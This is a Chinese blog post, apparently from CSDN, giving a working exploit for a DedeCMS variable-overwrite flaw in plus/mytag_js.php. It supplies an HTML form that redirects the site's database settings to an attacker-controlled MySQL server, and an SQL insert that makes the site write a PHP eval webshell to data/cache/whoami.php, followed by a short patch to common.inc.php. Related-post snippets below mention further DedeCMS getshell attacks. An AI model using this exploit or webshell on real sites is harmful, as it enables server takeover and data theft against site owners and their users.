dedecms 最新漏洞 利用mytag_js上传文件

最新推荐文章于 2024-08-27 08:07:05 发布
最新推荐文章于 2024-08-27 08:07:05 发布
阅读量7.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: dedecms 文章标签: input 数据库 firefox php fp insert
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sihun/article/details/6717526
本文详细解析了一个DedeCMS的潜在安全漏洞,并提供了有效的修复方法。通过使用特定的PHP代码插入策略,攻击者可以获取敏感信息。文章重点介绍了如何通过修改核心文件来阻止外部变量的非法提交,确保网站安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

制作文件 

  1. <form action="http://www.XXX.hk/plus/mytag_js.php?aid=2" method=post>
  2. <input type=text name="_COOKIE[GLOBALS][cfg_dbhost]" value="数据库ip"><br>
  3. <input type=text name="_COOKIE[GLOBALS][cfg_dbuser]" value="数据库用户名"><br>
  4. <input type=text name="_COOKIE[GLOBALS][cfg_dbpwd]" value="数据库密码"><br>
  5. <input type=text name="_COOKIE[GLOBALS][cfg_dbname]" value="数据库名字"><br>
  6. <input type=text name="_COOKIE[GLOBALS][cfg_dbprefix]" value="表前缀_"><br>
  7. <input type=text name="nocache" value="1"><br>
  8. <input type="submit" name='fuck' value='fuck'>
  9. </form>


然后在自己远程支持外链的mysql库中的表前缀_mytag 中插入insert into dede_mytag(aid,normbody) values(2,'{dede:php}$fp = @fopen(DEDEROOT."data/cache/whoami.php", ''a'');@fwrite($fp, ''<?php eval($_POST[whoami]) ?>'');echo "y";@fclose($fp);{/dede:php}{/dede:php}');然后用exp提交后会在data/cache/whoami.php 生成一句话 一句话密码whoami需要注意的地方就是当时挖出来的时候 测试了N久。。 最后才发现原来是浏览器的问题,用firefox打开exp提交就行了。

 

修复方法:这个漏洞主要的成因是dedecms没有判断外部提交的变量。暂时的修复方法找到include/common.inc.php文件,把
foreach($_REQUEST as $_k=>$_v)
{
var_dump($_k);
if( strlen($_k)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$_k) )
{
exit(‘Request var not allow!’);
}
}

换成

//检查和注册外部提交的变量
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k=>$_v) {
CheckRequest($_k);
CheckRequest($val[$_k]);
}
} else
{
if( strlen($val)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$val) )
{
exit(‘Request var not allow!’);
}
}
}
CheckRequest($_REQUEST);

DedeCMS存在的安全漏洞及编程解决方案“
HackSquad的博客
10-03 709
本文介绍了DedeCMS中常见的安全漏洞,包括SQL注入漏洞文件上传漏洞和跨站脚本漏洞,并提供了相应的编程解决方案。在开发和使用DedeCMS时时,务必注意安全性,并采取适当的措施来防止这些漏洞利用。在本文中,我们将详细介绍DedeCMS常见的安全漏洞,并提供相应的编程解决方案。为了防止文件上传漏洞,应该对上传文件进行严格的验证和过滤。可以检查文件的扩展名、文件类型、文件大小等,并将上传文件存储在一个独立的目录中,避免直接执行上传文件。为了防止跨站脚本漏洞,应该对用户输入的内容进行适当的转义。
网络安全事件应急响应实战二
热门推荐
悦分享
09-14 1万+
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业。新闻源网站一般权重较高,收录快,能够被搜索引擎优先收录,是黑灰产推广引流的必争之地,很容易成为被攻击的对象。短连接(short connnection)是相对于长连接而言的概念,指的是在数据传送过程中,只在需要发送数据时,才去建立一个连接,数据发送完成后,则断开此连接,即每次连接只完成一项业务的发送。
Dedecms5.7漏洞利用
qq_48732306的博客
11-07 1381
Dedecms5.7渗透测试 Dedecms5.7由于编程的问题,有一个可以直接篡改用户密码的漏洞,一下是复现过程: 一:启动环境: 首先要进行dedecms的安装,其下载地址为:] DeDeCMS 官网 http://www.dedecms.com/ [2]。 不过要安装dedecms还要搭建好服务器,而我选择的是使用warmpserve来搭建的,这个软件包含了apache2,php与mysql数据库,安装了就可以一键运行服务器。 Dedecms的安装包含了两个文件,把uploads那个文件放在warms
DeDe-cms 漏洞
weixin_69065643的博客
08-03 344
找到index.html修改。我们写一个一句话木马,点击访问后使用工具连接。
DedeCMS 未授权远程命令执行漏洞分析
Keepb1ue的博客
04-12 1525
DedeCMS是国内专业的PHP网站内容管理系统-织梦内容管理系统,采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY自己的网站提供了强有力的支持。高效率标签缓存机制:允许对同类的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
DeDeCMS-漏洞复现
weixin_57682301的博客
08-03 737
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。3.点击右方的编辑进入后改成写入的一句话木马,然后点击保存。1.点击模板--广告管理--生成一个新广告。
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 964
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
最新织梦cms漏洞之安全设置,有效防护木马(更新至20190920)
东北狼仙
10-22 1684
织梦CMS在安装完成后,新人往往会直接开始开发使用,忽视了一些安全优化的操作,这样会导致后期整个系统安全系数降低,被黑或者被注入的概率极高,毕竟这世界百分百存在着极多的无聊hacker对全网的网站进行扫描,扫到你这个菜站,尤其是使用率极高的DEDECMS,对你的站点下手的欲望更高,所以在开发前做好安全防范还是很有必要的! 安全设置前:备份网站文件数据库 系统安全优化设置之前,做好备份工作。 ...
魔兽世界python脚本拍卖行_Python大法之告别脚本小子系列—信息资产收集类脚本编写(上)...
weixin_39561431的博客
11-30 1479
0×01 前言在采集到URL之后,要做的就是对目标进行信息资产收集了,收集的越好,你挖到洞也就越多了…………当然这一切的前提,就是要有耐心了!!!由于要写工具较多,SO,我会分两部分写……0×02 端口扫描脚本编写端口扫描的原理:端口扫描,顾名思义,就是逐个对一段端口或指定的端口进行扫描。通过扫描结果可以知道一台计算机上都提供了哪些服务,然后就可以通过所提供的这些服务的己知漏洞就可进行攻击。其原理...
西域大都护府 第四期cfs靶场 渗透记录
ShenZ的博客
02-14 2188
西域大都护府 第四期cfs靶场 渗透记录1.DEDECMS2.二层探测+转发2.1 tomcat2.2 shiro2.3 weblogic3.第三层 官方wp: https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w 内网拓扑图 1.DEDECMS 首先是dedecms,会员功能被关闭了,那个前台的登陆口没法用 ps.dedecms一些漏洞 文件上传的payload:https://zhzhdoai.github.io/2019/07/28/Dedec
手把手教你dedecms命令执行漏洞复现,纯小白也能玩懂的漏洞复现
炙热的酷盖
08-05 1073
dedecms 5.7 sp2 存在命令执行漏洞 下载链接:http://www.dedecms.com/products/dedecms/ 选择UTF8就行 由于作者在进行漏洞复现时踩了很多坑,现将详细步骤附上,希望对大家有所帮助 首先需要有一个后台账号,登入网站后台 在后缀下输入/tpl.php?action=upload 查看网页源代码,找到token 记录下token: 065304c806f8f8dacb2aec2c41ace0d7 访问 http://192.16
织梦漏洞利用
weixin_53210070的博客
12-14 1694
Dedecms网站建立 php打开网站,开始安装 漏洞利用原理 dedecms系统中使用了SQL语句防注入功能引了的安全警告。在自定义模模型中使用了union|sleep|benchmark|load_file|outfile之一都会引发这个警告,此外采集的内容,如果有‘union 这类语法也会出现在这个警告。解决办法就是把安全检查关掉,打开include下面的dedesql.class.php 和dedesqli.class.php,$this->...
mytag
ailin52591314的博客
04-01 381
标签名称:mytag 功能说明:用于获取自定义宏标记的内容 适用范围:全局使用 基本语法: {dede:mytag typeid='0' name=''/} 参数说明: name = ’’ 标记名称,该项是必须的属性,以下 2、3是可选属性; ismake = ’yes|no’ 默认是 no 表示设定的纯HTML代码, yes 表示含板块标记的代码; typeid = ‘’ ...
dedecms织梦 标签远程文件写入漏洞
weixin_34261415的博客
03-21 238
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件,必须准备好自己的dede数据库,然后插入数据:   insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\''...
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
Innocence_0的博客
08-27 1405
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
DedeCMS(CVE-2019-8933)
m0_74559567的博客
03-15 1386
密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录。查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以。然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的。返回Bp插件界面,然后右键导入模板,填入接口url。payload1的位置,添加常用的密码字典进行爆破。点击浏览,是可以被成功解析的,使用蚁剑进行连接。payload2位置,选择的是验证码的插件。抓包验证码的网页后,右键发送到插件。
plus/mytag_js.php?aid=9090,DeDeCMS(织梦)变量覆盖0day getshell
weixin_35690449的博客
03-23 723
#!usr/bin/php -w<?phperror_reporting(E_ERROR);set_time_limit(0);print_r(´DEDEcms Variable CoverageExploit Author: www.heixiaozi.com www.webvul.com);echo "\r\n";if($argv[2]==null){print_r(´+--------...
织梦标签代码Mytag标记是什么
PHP错误汇总
09-27 346
织梦标签代码Mytag标记是什么 织梦标签代码Mytag是自定义宏标记。 标签名称:mytag 功能说明:用于获取自定义宏标记的内容 适用范围:全局使用 基本语法: {dede:mytag typeid='0' name=''/} 相关函数: 文件\include\taglib\mytag.lib.php第5行 function lib_mytag(&$ctag, &$refObj) 参数说明: name = ’’ 标记名称,该项是必须的属性,以下 2、3是可选属性; i
常见cms漏洞dedecms
ineedmoreMuQ的博客
08-03 524
DedeCMS是织梦团队开发PHP 网站管理系统,它以简单、易用、高效为特色,组建出各种各样各具特色的网站,如地方门户、行业门户、政府及企事业站点等。下载地址请网上自行寻找搭建方式选择php study首先搭建环境。
JavaScript 核心技术: MyTag 压缩包子文件解析
根据给定的信息,我们可以探讨的知识点将集中在JavaScript编程语言以及“我的标签”这一主题。由于没有具体的描述,我们将从JavaScript编程语言的基本概念、技术特性、应用场景及“标签”的相关技术实现进行深入分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值